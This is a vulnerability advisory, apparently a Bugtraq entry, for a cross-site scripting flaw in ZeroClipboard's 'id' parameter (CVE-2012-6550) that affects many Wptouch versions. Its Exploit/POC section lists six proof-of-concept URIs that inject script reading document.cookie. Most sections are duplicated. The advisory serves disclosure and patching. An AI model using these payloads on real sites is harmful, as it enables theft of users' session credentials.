ZeroClipboard 'id' Parameter Cross Site Scripting Vulnerability
BID:58116
Info
ZeroClipboard 'id' Parameter Cross Site Scripting Vulnerability
| Bugtraq ID: | 58116 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-6550 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 20 2013 12:00AM |
| Updated: | Aug 06 2013 08:45AM |
| Credit: | MustLive |
| Vulnerable: |
Bravenewcode Wptouch 1.9.26 Bravenewcode Wptouch 1.9.25 Bravenewcode Wptouch 1.9.24 Bravenewcode Wptouch 1.9.23 Bravenewcode Wptouch 1.9.22 Bravenewcode Wptouch 1.9.21 Bravenewcode Wptouch 1.9.20 Bravenewcode Wptouch 1.9.19 Bravenewcode Wptouch 1.9.18 Bravenewcode Wptouch 1.9.17 Bravenewcode Wptouch 1.9.16 Bravenewcode Wptouch 1.9.15 Bravenewcode Wptouch 1.9.14 Bravenewcode Wptouch 1.9.13 Bravenewcode Wptouch 1.9.12 Bravenewcode Wptouch 1.9.11 Bravenewcode Wptouch 1.9.10 Bravenewcode Wptouch 1.9.9 Bravenewcode Wptouch 1.9.8 Bravenewcode Wptouch 1.9.6 Bravenewcode Wptouch 1.7.5 Bravenewcode Wptouch 1.2.2 Bravenewcode Wptouch 1.9.9.8 Bravenewcode Wptouch 1.9.9.7 Bravenewcode Wptouch 1.9.9.6 Bravenewcode Wptouch 1.9.9.5 Bravenewcode Wptouch 1.9.9.4 Bravenewcode Wptouch 1.9.9.3 Bravenewcode Wptouch 1.9.9.2 Bravenewcode Wptouch 1.9.9.1 Bravenewcode Wptouch 1.9.8.3 Bravenewcode Wptouch 1.9.8.2 Bravenewcode Wptouch 1.9.8.1 Bravenewcode Wptouch 1.9.7.7 Bravenewcode Wptouch 1.9.7.6 Bravenewcode Wptouch 1.9.5 Bravenewcode Wptouch 1.9.22.1 Bravenewcode Wptouch 1.9.21.1 Bravenewcode Wptouch 1.9.19.5 Bravenewcode Wptouch 1.9.19.4 Bravenewcode Wptouch 1.9.19.3 Bravenewcode Wptouch 1.9.19.2 Bravenewcode Wptouch 1.9.19.1 Bravenewcode Wptouch 1.9.1 Bravenewcode Wptouch 1.9 Bravenewcode Wptouch 1.8.9.3 Bravenewcode Wptouch 1.8.9.1 Bravenewcode Wptouch 1.6 Bravenewcode Wptouch 1.5 Bravenewcode Wptouch 1.4 Bravenewcode Wptouch 1.3.5 Bravenewcode Wptouch 1.1 Bravenewcode Wptouch 1.0 |
| Not Vulnerable: | |
Discussion
ZeroClipboard 'id' Parameter Cross Site Scripting Vulnerability
ZeroClipboard is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ZeroClipboard versions prior to 1.1.7 are vulnerable.
ZeroClipboard is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ZeroClipboard versions prior to 1.1.7 are vulnerable.
Exploit / POC
ZeroClipboard 'id' Parameter Cross Site Scripting Vulnerability
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/themes/default/htdocs/flash/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/filemanager/views/js/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/themes/default/htdocs/flash/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/filemanager/views/js/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
Solution / Fix
ZeroClipboard 'id' Parameter Cross Site Scripting Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
ZeroClipboard 'id' Parameter Cross Site Scripting Vulnerability
References:
References: